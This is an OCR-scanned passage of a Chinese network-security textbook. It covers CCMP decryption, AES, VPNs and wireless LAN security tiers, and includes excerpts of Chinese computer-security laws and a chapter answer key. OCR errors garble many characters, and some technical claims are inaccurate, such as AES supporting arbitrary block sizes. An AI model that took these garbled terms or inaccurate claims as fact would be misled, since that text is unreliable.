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解密 过 程 如 图 14. 20 所 示 。 


MAC 地 址 头 部 信息 


Ls 
MIC 构造 AAD| 


A2, Priority 
| 
PN 


加 密 后 的 MPDU 


明文 数据 


密 钥 
PN | 检查 重 放 EST 人 
MPDU 
图 14. 20 CCMP 解密 过 程 图 
CCMP 解密 步骤 如 下 : 


QO@ 解析 加 密 过 的 MPDU ,创建 AAD 和 Nonce 值 ; 

@ AAD 是 由 加 密 过 的 MPDU 头 部 形成 的 ; 

@ Nonce 值 是 根据 A2、PN 和 优先 级 字 节 (保留 ,各 位 置 为 0) 创建 而 来 ; 

@ 提取 MIC 对 CCM 进行 完整 性 校 验 ; 

@ CCM 接收 过 程 使 用 临时 密 钥 ,AAD、Nonce、MIC 和 MPDU 加 密 数 据 来 解密 得 到 明 
文 , 同 时 对 AAD 和 MPDU 明文 进行 完整 性 校 验 ; 

@ 从 CCM 接收 过 程 收 到 的 MPDU 头 部 和 MPDU 明文 数据 连接 起 来 组 成 一 个 未 加 密 
的 MPDU; 

@ 解密 过 程 防止 了 MPDU 的 重 放 , 这 种 重 放 通过 确认 MPDU 里 的 PN 值 比 包含 在 会 
话 里 的 重 放 计 数 器 值 大 来 实现 ,接着 进行 检查 重 放 , 解 密 失 败 的 帧 被 直接 丢弃 。 

IEEE 802. 11i 在 WLAN 底层 引入 AES 算法 , 即 加 密 和 解密 一 般 由 硬件 完成 ,克服 了 
WEP 的 缺陷 。 

AES 是 一 种 对 称 的 块 加 密 技术 ,提供 比 WEP/TKIP 中 RC4 算法 更 高 的 加 密 性 能 。 对 
称 密码 系统 要 求 收 发 双方 都 知道 密 钥 ,802. 11i 体系 使 用 IEEE 802. 1x 认证 和 密 钥 协商 机 
制 来 管理 密 钥 。AES 加 密 算法 使 用 128 比特 分 组 加 密 数 据 ,输出 更 具有 随机 性 ,对 128 比 
特 、 轮 数 为 7 的 密 文 进行 攻击 时 几乎 需要 整个 密码 本 ,对 192、256 比特 加 密 的 密 文 进行 攻击 
不 仅 需 要 整个 密码 本 ,还 需要 知道 相关 的 但 并 不 知道 密 钥 的 密 文 ,这 比 WEP 具有 更 高 的 安 
全 性 。 解 密 的 密码 表 和 加 密 的 密码 表 是 分 开 的 ,支持 子 密 钥 加 密 , 加 密 和 解密 的 速度 快 ,在 
安全 性 上 优 于 WEP。 

AES 算法 支持 任意 分 组 的 大 小 , 密 钥 的 大 小 为 128、192、256, 可 以 任意 组 合 。 此 外 ， 
AES 还 具有 应 用 范围 广 .等 待 时 间 短 .相对 容易 隐藏 .吞吐 量 高 的 优点 。 经 过 比较 分 析 , 可 
知 此 算法 在 各 方面 性 能 都 优 于 WEP 和 TKIP, 利 用 此 算法 加 密 ,无 线 局 域 网 的 安全 性 会 获 
得 大 幅度 提高 ,能够 有 效 地 防御 外 界 攻 击 。 


7. 虚拟 专用 网 络 (VPN) 


虚拟 专用 网 络 是 指 在 一 个 公共 IP 网 络 平台 上 通过 隧道 以 及 加 密 技 术 保证 专用 数据 的 
网 络 安全 。 目 前 许多 企业 以 及 网 络 运营 商 已 经 采用 VPN 技术 。VPN 可 以 替代 连 线 对 等 保 
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密 解 决 方案 以 及 物理 地 址 过 滤 解 决 方案 。 采 用 VPN 技术 的 另外 一 个 好 处 是 可 以 提供 基于 
RADIUS 的 用 户 认证 以 及 计 费 。VPN 技术 不 属于 IEEE 802. 11 协议 标准 ,因此 它 只 是 一 
种 增强 性 网 络 解决 方案 。 


14.33 无 线 局 域 网 的 安全 策略 


由 于 宽带 无 线 网 络 的 物理 特性 和 安全 算法 的 不 完善 ,其 安全 方面 的 隐患 比 有 线 网 络 来 
得 更 加 严重 。 


1. 无 线 网 络 安全 现状 


根据 英国 Red-M 公司 的 调查 ,70% 以 上 的 企业 无 线 网 络 缺 乏 有 效 的 安全 防护 。 虽 然 
IEEE、Wi-Fi 等 标准 组 织 早 些 时 候 颁 布 了 新 的 宽带 无 线 安全 标准 ,但 消费 者 手中 的 宽带 无 
线 产 品 的 大 多 数 并 不 十 分 安全 。 现 有 的 宽带 无 线 产 品 的 安全 功能 易 用 性 很 差 , 在 进行 配置 
客户 端 网 卡 时 还 需要 依次 输入 26 位 十 六 进 制 密码 。 于 是 大 多 数 消 费 者 选择 了 设备 的 出 厂 
配置 。 普 通用 户 可 以 通过 禁止 SSID 广播 ,进行 简单 的 MAC 地 址 过 滤 , 进 行 WEP 加 密 以 
及 启用 个 人 网 络 安全 软件 的 WLAN 防护 功能 来 获得 基本 的 安全 保障 。 

根据 RSA 安全 部 门 2005 年 的 WLAN 调查 报告 ,超过 三 分 之 一 的 伦敦 Wi-Fi 网 基础 都 
不 可 靠 。2006 年 同样 的 调查 发 现 15% 的 网 络 处 于 攻击 的 威胁 之 中 。 伦 敦 26% 的 接 入 点 仍 
然 采 用 默认 的 设置 , 极 易 受到 攻击 。 在 所 有 被 调查 的 城市 中 ,超过 三 分 之 一 的 商务 无 线 网 络 
不 安全 ,伦敦 为 36% ,法 兰 克 福 为 34% ,纽约 为 38%……: 

无 线 网 络 安全 问题 源 于 人 们 过 低 的 防范 意识 ,虽然 无 线 设备 厂商 提供 了 很 多 安全 措施 ， 
但 普遍 存在 用 户 不 想 配置 或 想 配 但 不 会 配置 安全 策略 的 情况 。 而 无 线 产品 的 安全 策略 默认 
状态 下 大 多 是 关闭 的 ,其 默认 使 用 的 登录 IP 地 址 、 用 户 名 和 密码 也 被 人 进行 了 总 结 。 


2. 无 线 网 络 的 一 些 安全 策略 


当 用 户 使 用 了 IEEE 802. 1x、EAP、AES 和 TKIP 之 后 ,还 需要 了 解 其 中 存在 的 一 些 问 
题 ,这 些 是 建立 安全 WLAN 网 络 环境 必须 的 。 首 先 ,IEEE 802. 11i 工作 小 组 所 建立 的 
TKIP, 是 为 了 快速 修正 WEP 的 严重 问题 。TKIP 在 算法 上 与 WEP 相同 ,也 是 使 用 RC4 算 
法 ,但 这 种 算法 并 不 是 最 理想 的 选择 。 使 用 AES 能 把 原来 的 问题 解决 得 更 好 ,但 是 AES 无 
法 与 原 有 的 IEEE 802. 11 架构 兼容 ,需要 升级 软 硬 件 。 其 次 一 些 新 的 协议 .技术 的 加 入 ,与 
原 有 IEEE 802. 11 混合 在 一 起 ,使 得 整个 网 络 结构 更 加 复杂 ,同时 也 增加 了 处 理 的 负担 , 导 
致 网 络 性 能 降低 。 新 的 技术 让 生产 厂商 和 网 络 用 户 有 更 多 的 可 选择 性 ,但 同时 也 带 来 了 兼 
容 性 的 问题 。 第 三 ,对 于 用 户 来 说 ,在 购买 设备 之 前 ,需要 了 解 产品 能 提供 什么 样 的 功能 ,有 
什么 样 的 兼容 性 的 要 求 。 例 如 ,从 公司 A 购买 了 AP, 然 后 从 公司 B 和 C 购买 了 无 线 网 卡 ， 
很 可 能 存在 因 互 不 兼容 导致 某 些 功能 无 法 使 用 的 问题 。 

从 企业 角度 而 言 , 随 着 无 线 网 络 应 用 的 推进 ,企业 需要 更 加 重视 无 线 网 络 安全 的 问题 ， 
针对 不 同 的 用 户 需 求 ,提出 一 系列 不 同 级 别 的 无 线 安全 技术 策略 ,从 传统 的 WEP 加 密 到 
IEEE 802. 11i, 从 MAC 地 址 过 滤 到 IEEE 802. 1x 安全 认证 技术 ,要 分 别 考虑 能 满足 单一 的 
家 庭 用 户 、 大 中 型 企业 、 运 营 商 等 不 同 级 别 的 安全 需求 。 

对 于 小 型 企业 和 家 庭 用 户 而 言 ,无 线 接 人 用 户 数量 比较 少 ,一 般 没有 专业 的 IT 管理 人 
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员 ,对 网 络 安全 性 的 要 求 相对 较 低 。 通 常情 况 下 不 会 配备 专用 的 认证 服务 器 ,这 种 情况 下 ， 
可 直接 采用 AP 进行 认证 ,WPA-PSK 十 接 入 点 隐藏 可 以 保证 基本 的 安全 级 别 。 

在 仓库 物流 、 医 院 ,学 校 等 环境 中 ,考虑 到 网 络 覆盖 范围 以 及 终端 用 户 数量 ,AP 和 无 线 
网 卡 的 数量 必 将 大 大 增加 ,同时 由 于 使 用 的 用 户 较 多 ,安全 隐患 也 相应 增加 ,此 时 简单 的 
WPA-PSK 已 经 不 能 满足 此 类 用 户 的 需求 。 如 表 14. 2 中 所 示 的 中 级 安全 方案 使 用 支持 
IEEE 802. 1x 认证 技术 的 AP 作为 无 线 网 络 的 安全 核心 ,并 通过 后 台 的 RADIUS 服务 器 进 
行 用 户 身份 验证 ,能 有 效 地 阻止 未 经 授权 的 用 户 接 和 人 。 

在 各 类 公共 场合 以 及 网 络 运营 商 、 大 中 型 企业 ,金融 机 构 等 环境 中 ,有 些 用 户 需 要 在 热 
点 公共 地 区 (如 机 场 、 咖 啡 店 等 ) 通 过 无 线 接 入 Internet, 因 此 用 户 认证 问题 就 显得 至 关 重 
要 。 如 果 不 能 准确 可 靠 地 进行 用 户 认证 ,就 有 可 能 造成 服务 盗用 的 问题 ,这 种 服务 次 用 对 于 
无 线 接 人 服务 提供 商 来 说 是 不 可 接受 的 损失 , 表 中 专业 级 解决 方案 可 以 较 好 地 满足 这 类 用 
户 的 需求 ,通过 用 户 隔离 技术 、IEEE 802. 1i、RADIUS 的 用 户 认 证 以 及 计 费 方式 确保 用 户 
的 安全 。 

无 线 网 络 的 安全 级 别 及 适用 场合 如 表 14. 2 中 所 示 。 


表 14.2 无 线 网 络 的 安全 级 别 及 适用 场合 
安全 级 别 典型 场合 使 用 技术 


初级 安全 小 型 企业 ,家庭 用 户 等 WPA-PSK 十 接 入 点 隐藏 

中 级 安全 仓库 物流 医院、 学 校 ,餐饮 娱乐 ”IEEE 802. 1x 认证 十 TKIP 加 密 

专业 级 安全 各 类 公共 场合 及 网 络 运营 商 . 大 用户 隔离 技术 十 IEEE802. 11i 十 RADIUS 认 
中 型 企业 ,金融 机 构 证 和 计 费 (对 运营 商 ) 


局 


题 


.Wi-Fi 的 全 称 是 什么 ? MIMO 的 全 称 是 什么 ? 
什么 是 热点 ? 
. 无 线 局 域 网 络 的 优点 有 哪些 ?影响 无 线 局 域 网 性 能 的 因素 有 哪些 ? 
. Super G 技术 采用 了 哪些 关键 技术 ? 
. 根据 网 络 解决 方案 进行 划分 ,无 线 网 络 可 以 分 为 哪 几 类 ? 根据 连接 方式 进行 划分 ， 
无 线 网 络 可 以 分 为 哪 几 类 ? 
6. 无 线 局 域 网 受到 的 安全 威胁 来 自 哪 几 方面 ? 
7.【 思 考题 ] 如 何 利用 现 有 的 网 络 资源 搭建 一 个 无 线 网 络 环境 ? 
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附录 A 与 计算 机 网 络 安全 相关 的 
法 律 条 文 


1. 1991 年 6 月 4 日 ,国务 院 发 布 ( 计 算 机 软件 保护 条 例 》。 

第 三 十 条 

(五 ) 未 经 软件 著作 权 人 或 者 其 合法 受 让 者 的 同意 修改 ,翻译 .注释 其 软件 作品 。 

(六 ) 未 经 软件 著作 权 人 或 者 其 合法 受 让 者 的 同意 复制 或 者 部 分 复制 其 软件 作品 。 

2. 1994 年 2 月 18 日, 国务院 发 布 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》。 

第 二 十 条 ”违反 本 条 例 的 规定 ,有 下 列 行为 之 一 的 ,由 公安 机 关 处 以 警告 或 者 停机 
整顿 ; 

(一 ) 违反 计算 机 信息 系统 安全 等 级 保护 制度 ,危害 计算 机 信息 系统 安全 的 ; 

(二 ) 违反 计算 机 信息 系统 国际 联网 备案 制度 的 ; 

(三 ) 不 按照 规定 时 间 报 告 计算 机 信息 系统 中 发 生 的 案件 的 ; 

(四 ) 接 到 公安 机 关 要 求 改进 安全 状况 的 通知 后 ,在 限期 内 拒 不 改进 的 ; 

(五 ) 有 危害 计算 机 信息 系统 安全 的 其 他 行为 的 。 

第 二 十 三 条 ”故意 传播 计算 机 病毒 以 及 其 他 有 害 数据 ,危害 计算 机 信息 系统 安全 的 ,或 
者 未 经 许可 出 售 计算 机 信息 系统 安全 专用 产品 的 ,由 公安 机 关 处 以 警告 或 者 对 个 人 处 以 
5000 元 以 下 的 罚款 、 对 单位 处 以 15000 元 以 下 的 罚款 ; 有 违法 所 得 的 , 除 予以 没收 外 ,还 处 
以 违法 所 得 1 至 3 倍 的 罚款 。 

第 二 十 四 条 ”违反 本 条 例 的 规定 ,构成 违反 治安 管理 行为 的 ,依照 (中 华人 民 共和 国治 
安 管 理 处 罚 条 例 ) 的 有 关 规 定 处 罚 ; 构成 犯罪 的 ,依法 追究 其 刑事 责任 。 

第 二 十 五 条 ”任何 组 织 或 者 个 人 违反 本 条 例 的 规定 ,给 国家 、 集 体 或 者 他 人 财产 造成 损 
失 的 ,应 当 依法 承担 民事 责任 。 

3. 1996 年 4 月 , 原 邮电 部 颁布 (中 国 公用 计算 机 互联 网 国际 联网 管理 办 法 》。 

第 八条 接 人 单位 负责 对 其 接 人 网 内 用 户 的 管理 ,并 按照 规定 与 用 户 签订 协议 ,明确 双 
方 的 权利 、 义 务 和 责任 。 

第 九条 ” 接 入 单位 和 用 户 应 遵守 国家 法 律 、 法 规 ,加 强 信息 安全 教育 ,严格 执行 国家 保 
密 制度 ,并 对 所 提供 的 信息 内 容 负 责 。 

第 十 条 ”任何 组 织 或 个 人 ,不 得 利用 计算 机 国际 联网 从 事 危 害 国家 安全 ,泄露 国家 秘密 
等 犯罪 活动 ; 不 得 利用 计算 机 国际 联网 查阅 、 复 制 、 制 造 和 传播 危害 国家 安全 ,妨碍 社会 治 
安 和 淫秽 色情 的 信息 。 发 现 上 述 违法 犯罪 行为 和 有 害 信息 ,应 及 时 向 有 关 主 管 部 门 报告 。 

第 十 一 条 ”任何 组 织 或 个 人 ,不 得 利用 计算 机 国际 联网 从 事 危害 他 人 信息 系统 和 网 络 
安全 ,侵犯 他 人 合法 权益 的 活动 。 

第 十 五 条 ”违反 本 办 法 第 九条 、 第 十 条 ,第 十 一 条 规定 的 ,由 邮电 部 或 邮电 管理 局 给 予 
警告 ,撤销 批准 文件 并 通知 公用 电信 企业 停止 其 联网 接续 。 情 节 严 重 的 ,由 公安 机 关 依 法 给 
予 处 罚 ; 构成 犯罪 的 ,提请 司法 机 关 依 法 追究 其 刑事 责任 。 
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4. 1997 年 3 月 15 日 ,全 国人 民 代 表 大 会 颁布 (中 华人 民 共 和 国 刑法 》。 

第 二 百 八 十 五 条 违反 国家 规定 ,侵入 国家 事务 、 国 防 建设 .尖端 科学 技术 领域 的 计算 
机 信息 系统 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

第 二 百 八 十 六 条 ”违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 、 修 改 、 增 加 .干扰 
的 ,造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 严 重 的 ,处 五 年 以 下 有 期 徒刑 或 者 拘役 ; 后 果 
特别 严重 的 ,处 五 年 以 上 有 期 徒刑 。 

违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 、 增 加 的 操作 ,后 果 严 重 的 ,依照 前 款 的 规定 处 罚 。 故 意 制作 传播 计算 机 病毒 等 破坏 性 
程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 ,依照 第 一 款 的 规定 处 罚 。 

第 二 百 八 十 七 条 “利用 计算 机 实施 金融 诈骗 盗窃、 贪污 、 挪 用 公款 、 窃 取 国家 秘密 或 者 
其 他 犯罪 的 ,依照 本 法 有 关 规 定 定罪 处 罚 。 

5. 1996 年 4 月 ,邮电 部 电信 总 局 下 发 (关于 加 强 中 国 公 用 计算 机 互联 网 Chinanet 网 络 
安全 管理 的 通知 》。 

6. 1997 年 12 月 30 日 ,公安 部 发 布 (计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 》。 

第 四 条 任何 单位 和 个 人 不 得 利用 国际 联网 危害 国家 安全 ,泄露 国家 秘密 ,不 得 侵犯 国 
家 、 社 会 .集体 的 利益 和 公民 的 合法 权益 ,不 得 从 事 违 法 犯罪 活动 。 

第 六 条 ”任何 单位 和 个 人 不 得 从 事 下 列 危 害 计算 机 信息 网 络 安全 的 活动 ; 

(一 ) 未 经 允许 ,进入 计算 机 信息 网 络 或 者 使 用 计算 机 信息 网 络 资源 的 ; 

(二 ) 未 经 允许 ,对 计算 机 信息 网 络 功 能 进行 删除 ,修改 或 者 增加 的 ; 

(三 ) 未 经 允许 ,对 计算 机 信息 网 络 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 或 者 增加 的 

(四 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 的 ; 

(五 ) 其 他 危害 计算 机 信息 网 络 安全 的 。 

第 七 条 ”用 户 的 通信 自由 和 通信 秘密 受 法 律 保护 。 任 何 单位 和 个 人 不 得 违反 法 律 规 
定 ,利用 国际 联网 侵犯 用 户 的 通信 自由 和 通信 秘密 。 

第 十 三 条 ”使 用 公用 账号 的 注册 者 应 当 加 强 对 公用 账号 的 管理 ,建立 账号 使 用 登记 制 
度 。 用 户 账号 不 得 转借 转让。 

第 二 十 条 ”违反 法 律 .行政 法 规 , 有 本 办 法 第 五 条 ,第 六 条 所 列 行为 之 一 的 ,由 公安 机 关 
给 予 警告 有 违法 所 得 的 ,没收 违法 所 得 ,对 个 人 可 以 并 处 五 千 元 以 下 的 罚款 ,对 单位 可 以 
并 处 一 万 五 千 元 以 下 的 罚款 ; 情节 严重 的 ,可 以 给 予 六 个 月 以 内 停止 联网 、 停 机 整顿 的 处 
罚 , 必 要 时 可 以 建议 原 发 证 \ 审 批 机 构 吊 销 经 营 其 许可 证 或 者 取消 其 联网 资格 ; 构成 违反 治 
安 管 理 条 例 的 ,依照 治安 管理 处 罚 条 例 的 规定 处 罚 ; 构成 犯罪 的 ,依法 追究 其 刑事 责任 。 


附录 B 习题 答案 


本 附录 包含 了 每 章 习题 的 答案 。 由 于 有 些 问题 是 采用 简短 回答 的 方式 ,所 以 答案 可 能 

不 尽 相 同 。 本 书 作 者 为 每 个 问题 给 出 了 尽 可 能 最 好 的 解答 和 解释 。 
第 1 章 

1. 网 络 安全 的 四 种 威胁 是 什么 ? 

答 : 网 络 安全 的 四 种 威胁 类 型 分 别 是 无 组 织 的 威胁 、 有 组 织 的 威胁 、 外 部 威胁 和 内 部 
威胁 。 

2. 攻击 的 三 种 主要 类 型 是 什么 ? 

答 : 三 种 主要 的 攻击 类 型 是 侦察 .访问 和 拒绝 服务 。 

3. 为 什么 需要 网 络 安全 ? 

答 : 因为 Internet 具有 全 球 连 通 的 特性 ,黑客 可 以 从 世界 上 的 任何 地 点 对 我 们 的 网 络 
发 起 攻击 。 

4. 什么 是 网 络 侦 听 ? 

答 : 网 络 侦 听 是 指 网 络 上 的 系统 .服务 或 者 弱点 的 非 授 权 定位 。 

5. 增强 局 域 网 安全 的 方案 有 哪些 ? 增强 广域网 安全 的 技术 有 哪些 ? 

答 : 增强 局 域 网 安全 的 方案 主要 有 : 网 络 分 段 , 以 交换 式 集线器 代替 共享 式 集 线 器 , 划 
分 VLAN 等 。 增 强 广域网 安全 的 技术 主要 有 : 加 密 技术 、VPN 技术 和 身份 认证 技术 等 。 

6. 数据 加 密 技术 可 以 分 为 哪 三 类 ? 

答 : 数据 加 密 技术 可 以 分 为 三 类 , 即 对 称 型 加 密 、 不 对 称 型 加 密 和 不 可 逆 加 密 。 

第 2 章 

1. 数据 安全 主要 的 三 个 组 成 部 分 是 什么 ? 

答 : 从 保护 数据 的 角度 讲 , 对 数据 安全 这 个 广义 概念 ,可 以 细 分 为 3 部 分 : 数据 加 密 、 数 
据 传 输 安全 和 身份 认证 管理 。 

2. 加 密 技 术 经 历 的 三 个 阶段 是 什么 ? 

答 : 按照 发 展 进程 来 看 ,密码 经 历 了 古典 密码 、 对 称 密 钥 密码 和 公开 密 钥 密码 3 个 
阶段 。 

3. 加 密 技 术 通 常 分 为 哪 两 大 类 ? 

答 : 加 密 技术 通常 分 为 两 大 类 : 对 称 式 加 密 和 非 对 称 式 加 密 。 

4. DES 主要 的 应 用 范围 是 哪些 ? 

答 : DES 主要 的 应 用 范围 有 : 计算 机 网 络 通信 电子 资金 传送 系统 、 保 护 用 户 文件 和 用 
户 识别 等 方面 。 


附录 B 习题 答 


第 3 章 

1. 什么 是 SSL? 

答 : SSL 是 Secure Sockets Layer 通信 协议 的 缩 略语 , 它 是 被 设计 用 来 保护 传输 过 程 中 
的 资料 , 它 的 任务 是 把 在 网 页 以 及 服务 器 之 间 的 数据 传输 加 密 。 

2. 什么 是 证 书 ? 证 书 有 哪些 用 途 ? 

答 : 公 钥 证 书 (通常 称 为 证 书 ) 是 通常 用 于 身份 验证 的 经 过 数字 签名 的 声明 , 它 可 以 保 
护 开放 网 络 中 的 信息 。 证 书 将 公 钥 与 保存 对 应 私 钥 的 实体 牢固 地 绑 定 在 一 起 。 颁 发 证 书 的 
CA 对 证 书 进行 数字 签名 ,可 以 为 用 户 、 计 算 机 或 服务 颁发 这 些 证 书 。 

证 书 可 以 应 用 在 安全 电子 邮件 、 安 全 Web 通信 ,安全 网 站 、 软 件 文件 的 数字 签名 、 本 地 
网 络 智 能 卡 身份 验证 .远程 访问 智能 卡 身份 验证 .IPSec 身份 验证 和 EFS 恢复 代理 等 方面 。 

3. 在 HTTPS( 通 过 SSL 的 HTTP) 身 份 验 证 中 使 用 的 两 种 证 书 是 什么 ? 

答 : 在 HTTPS 身份 验证 中 使 用 的 证 书 通常 有 服务 器 证 书 和 客户 端 证 书 两 种 。 

4. SSL 协议 的 两 个 组 成 部 分 分 别 是 什么 ? 

答 : SSL 协议 分 为 两 部 分 : Handshake Protocol 和 Record Protocol。 其 中 Handshake 
Protocol 用 来 协商 密 钥 ,协议 的 大 部 分 内 容 就 是 通信 双方 如 何 利用 它 来 安全 的 协商 出 一 份 
密 钥 。Record Protocol 则 定义 了 传输 的 格式 。 

第 4 章 

1. 什么 是 信息 隐藏 ”信息 隐藏 技术 主要 包括 哪 两 部 分 ? 

答 : 信息 隐藏 主要 是 研究 如 何 将 某 一 机 密 信息 秘密 隐藏 于 另 一 公开 的 信息 中 ,然后 通 
过 公开 信息 的 传输 来 传递 机 密 信 息 。 信 息 隐藏 技术 主要 包括 : 信息 嵌入 算法 以 及 隐蔽 信息 
检测 /提取 算法 (检测 器 ) 两 部 分 。 

2. 信息 隐藏 主要 应 用 在 哪 几 方面 ? 

答 : 信息 隐藏 主要 应 用 在 数字 内 容 保护 、 隐 项 通信 和 安全 监测 等 方面 。 

3. 阔 下 信道 的 狭义 定义 是 什么 ? 阀 下 信道 的 广义 定义 是 什么 ? 

答 : 浆 下 信道 的 狭义 定义 : 冰 下 信道 是 这 样 一 个 信道 , 它 存 在 于 诸如 密码 系统 ,认证 系 
统 和 数字 签名 方案 等 密码 协议 中 ,该 信道 在 发 送 者 和 隐藏 的 接收 者 之 间 传 送 秘密 的 信息 ,该 
信息 不 能 被 公众 和 信道 管理 者 所 发 现 。 

阔 下 信道 的 广义 定义 : 阀 下 信道 是 这 样 一 个 信道 ,公开 的 有 意义 的 信息 仅仅 是 充当 了 
秘密 的 载体 ,秘密 信息 通过 它 进行 传输 。 

4. 文件 格式 BMP、GIF、JPEG 的 全 称 各 是 什么 ? 

答 : BMP 的 全 称 是 BitMap-File。GIF 的 全 称 是 Graphics Interchange Format。JPEG 
的 全 称 是 Joint Photo graphic Experts Group 。 


第 5 章 
1. 病毒 的 定义 是 什么 ? 可 以 按 哪 三 种 方式 对 病毒 进行 分 类 ? 


答 : 计算 机 病毒 的 定义 是 能 够 通过 某 种 途径 潜伏 在 计算 机 存储 介质 (或 程序 ) 里 , 当 达 
到 某 种 条 件 时 即 被 激活 ,能 够 对 计算 机 资源 进行 破坏 的 一 组 程序 或 指令 的 集合 。 可 以 按 病 
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毒 感染 的 对 象 , 病 毒 的 破坏 程度 、 病 毒 的 入 侵 方式 对 病毒 进行 分 类 。 

2. 什么 是 VBS 病毒 ? 

答 : VBS 病毒 是 用 VB Script 编写 而 成 ,它们 利用 Windows 系统 的 开放 性 的 特点 , 通 
过 调用 一 些 现成 的 Windows 对 象 , 组 件 .可 以 直接 对 文件 系统 和 注册 表 等 进行 控制 。 

3. 什么 是 WSH? 

答 : WSH 是 Windows Scripting Host 的 缩写 ,其 通用 的 中 文 译名 为 “Windows 脚本 

4. 什么 是 缓冲 区 溢出 ? 

答 : 缓冲 区 溢出 是 指 当 计算 机 程序 向 缓冲 区 内 填充 的 数据 位 数 超过 了 缓冲 区 本 身 的 容 
量 时 ,溢出 的 数据 覆盖 在 合法 数据 上 。 

第 6 章 

1. VPN 的 安全 管理 包括 哪 几 项 ? 

答 : VPN 的 安全 管理 包括 : 隧道 协议 ,资料 加 密 、 认 证 和 存 取 控制 等 方面 。 

2. 确保 无 线 接 人 安全 性 的 安全 管理 策略 包括 哪 几 项 ? 

答 : 为 确保 无 线 接 人 的 安全 性 的 安全 管理 策略 应 包括 : 使 用 动态 密 钥 管理 .定期 稽核 
和 认证 等 方面 。 

3. 利用 RAS 的 方式 进行 远程 访问 的 缺点 是 什么 ? 

答 : 利用 RAS 的 方式 进行 远程 访问 的 缺点 是 : 在 同一 时 刻 只 允许 一 个 用 户 连 接 , 其 电 
话费 的 开销 是 很 大 的 。 

4. Windows 2000 远程 控制 的 三 种 安全 解决 方法 是 什么 ? 

答 : Windows 2000 远程 控制 的 安全 解决 方法 包括 : 结合 Zebedee 软件 ,在 SSH 上 使 用 
VNC, 使 用 VPN 技术 等 。 

第 7 章 

1. SQL Server 的 两 种 安全 模式 是 什么 ? 

答 : SQL Server 有 两 种 安全 模式 。 一 种 是 “ 仅 Windows” 模 式 , 另 一 种 是 “SQL 与 
Windows 用 户 身 份 验证 ?模式 。 

2. SQL Server 基本 安全 级 别 “ 登 录 ” 和 “用 户 ” 的 区 别 是 什么 ? 

答 :“ 登 录 ? 是 指 允 许 用 户 访问 服务 器 并 拥有 服务 器 级 别 权 限 的 账户 ,属于 系统 级 别 , 权 
限 的 大 小 取决 于 系统 赋予 该 登录 账户 的 权限 级 别 ,如 sa 账户 , 它 是 sysadmin 级 别 ,那么 使 
用 sa 登录 就 可 以 取得 数据 库 系 统 的 最 高 权限 。“ 用 户 ” 属 于 数据 库 级 别 , 拥 有 对 数据 库 及 其 
单独 对 象 的 访问 权限 ,可 以 精确 到 表 、 行 和 字段 等 。 

3. SQL Server 安全 性 机 制 的 四 个 等 级 分 别 是 什么 ? 

答 : SQL Server 安全 性 机 制 的 四 个 等 级 分 别 是 : 客户 机 操作 系统 的 安全 性 .SQL 
Server 的 登录 安全 性 ,数据 库 的 使 用 安全 性 和 使 用 数据 库 对 象 的 安全 性 。 

4. 什么 是 SQL Server 中 的 角色 ? 在 SQL Server 中 角色 分 为 哪 两 种 ? 

答 : 角色 是 从 SQL Server 7. 0 开始 引入 的 ,用 来 集中 管理 数据 库 或 服务 器 权限 的 概念 。 
角色 可 以 看 作 是 一 组 数据 库 用 户 的 集合 ,类 似 于 Windows NT 中 的 用 户 组 。 数 据 库 管理 员 


附录 B 习题 答 


把 操作 数据 库 的 权限 赋予 角色 ,再 把 角色 赋 给 数据 库 用 户 或 登录 账号 ,从 而 让 数据 库 用 户 登 
录 账 号 ,拥有 相应 的 权限 。 

在 SQL Server 中 角色 分 为 服务 器 级 的 “固定 服务 器 角色 ”和 数据 库 级 的 “数据 库 级 角 
色 ” 两 种 。 

5. 什么 是 SQL Server 中 的 许可 ? 

答 : 数据 库 许可 是 数据 库 权限 管理 的 最 后 一 道 防 线 。 当 数据 库 对 象 刚 被 创建 时 ,只 有 
数据 库 的 创建 者 可 以 访问 该 数据 库 。 任 何其 他 用 户 想 访问 该 数据 库 必须 获得 创建 者 的 许 
可 。 创 建 者 可 以 授予 许可 给 指定 的 数据 库 用 户 。 

6. SQL 防范 注入 式 攻 击 的 方法 包含 哪 几 点 ? 

答 : 对 文本 输入 框 进 行 过 滤 ,限制 文本 框 输入 字符 的 长 度 , 检 查 用 户 输入 的 合法 性 , 确 
信和 输入 的 内 容 只 包含 合法 的 数据 ,使 用 带 参 数 的 SQL 语句 形式 ,保持 异常 信息 的 私有 性 。 

第 8 章 

1. ASP 的 全 称 是 什么 ? 

答 : ASP 的 全 称 是 Microsoft Active Server Pages, 即 Microsoft 现 用 服务 器 网 页 。 它 
是 服务 器 端 脚本 编写 的 一 个 环境 ,使 用 它 可 以 创建 和 运行 动态 .交互 的 Web 服务 器 应 用 
程序 。 

2. IIS 5.0 和 了 IIS 6.0 的 重要 区 别 是 什么 ? 

答 : IIS 5.0 和 IIS 6.0 的 主要 区 别 是 : 核心 功能 和 服务 的 区 别 、 隔 离 模 式 的 区 别 .配置 
数据 库 的 区 别 、 网 站 管理 的 区 别 .语言 使 用 的 区 别 、 安 全 原理 的 区 别 、 性 能 设计 的 区 别 和 IIS 
工具 组 件 的 区 别 。 

3. 如 何 配置 Windows 系统 来 保障 IIS 的 安全 ? 

答 : 通过 应 用 NTFS 文件 系统 ,安装 Windows NT 最 新 的 补丁 ,设置 访问 目录 的 权限 ， 
为 系统 管理 员 账 号 更 名 ,关闭 无 用 的 服务 和 协议 ,保护 Global. asa 文件 安全 ,用 户 访问 权限 
控制 等 方法 来 保障 IIS 的 安全 。 

第 9 章 

1. 什么 是 SMTP 协议 ? 

答 : SMTP 称 为 简单 邮件 传输 协议 (Simple Mail Transfer Protocal) ,目标 是 向 用 户 提 
供 高 效 、 可 靠 的 邮件 传输 。SMTP 的 一 个 重要 特点 是 它 能 够 在 传送 中 接力 传送 邮件 , 即 邮 
件 可 以 通过 不 同 网 络 上 的 主机 接力 式 传送 。 工 作 在 两 种 情况 下 : 一 是 电子 邮件 从 客户 机 传 
